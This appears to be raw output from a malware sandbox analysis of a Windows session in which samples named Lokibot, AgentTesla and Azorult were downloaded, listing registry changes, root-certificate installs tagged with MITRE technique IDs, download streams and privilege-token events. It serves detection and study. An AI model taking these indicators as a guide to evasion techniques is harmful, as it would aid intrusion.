Set value (str)	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Software\Piriform\CCleaner\AutoICS = "1"	ccsetup622.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\Shell\Run CCleaner\command	ccsetup622.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Run CCleaner	ccsetup622.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\C06AEB9D-8774-46E7-8160-8321BCD14D9F\5E1D6A55-0134-486E-A166-38C2E4919BB1 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAzlqzz1GB0UyOfGwYmjhjTQQAAAACAAAAAAAQZgAAAAEAACAAAACe8Lgr6X7mL6yDqAIjB+FvmJUKPw21SOBPVKlKcb4FKAAAAAAOgAAAAAIAACAAAAChMWjEvkjTSnuGXj7OX6y4botghAUf8AnwJJZCwXyeFTAAAAC6+exxFXHRODB5FvBwmr42Jz7fxnpY7H4mwTnlNIwouHCRTVXVftRexyH+lwA+E0hAAAAADtHgBPykyvsQSYYgluHY58J2u9RRCM97SgDppXxggbxWEscQMqQCG4lwd8wdrLNl5sTMs9raFU6kink1x0kH+g=="	CCleaner64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3263309122-2820180308-3568046652-1000\{3A1E4450-7649-4AAC-B522-28DD9CE3B21F}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3263309122-2820180308-3568046652-1000\{DAC91002-7BAC-4211-91CC-22F719BA41C7}	chrome.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	v925bE0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	v925bE0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	v925bE0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	v925bE0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	v925bE0.exe

NTFS ADS 40 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\butterflyondesktop (1).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Dr0p1t_Server (1).py:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 848395.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 431133.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 649591.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ccsetup622.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 278585.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 57022.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 864933.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 472036.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 692832.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 129606.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Dr0p1t_Server.py:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 596058.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 199615.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 270416.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 900735.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 551860.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Solaris 2.0 (2).bat:Zone.Identifier	Process not Found
File opened for modification	C:\Users\Admin\Downloads\ExternalLib.exe:Zone.Identifier	Process not Found
File opened for modification	C:\Users\Admin\Downloads\OneLaunch - Easy PDF_n1yaa.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Solaris 2.0.z01:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 139679.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 217800.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 729735.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\SpySheriff.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\setup_64JzqalmqE.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 305413.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 526720.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 774374.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 506565.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 832554.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 438621.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Solaris 2.0.zip:Zone.Identifier	Process not Found
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 983477.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1848	regedit.exe
5336	regedit.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
8036	Process not Found

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	1267	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3768	chrome.exe
3768	chrome.exe
1276	chrome.exe
1276	chrome.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4628	ccsetup622.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe
4896	CCleaner64.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2120	CCleaner64.exe
5724	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
3768	chrome.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe
5956	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2000	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
Token: SeCreatePagefilePrivilege	3768	chrome.exe
Token: SeShutdownPrivilege	3768	chrome.exe
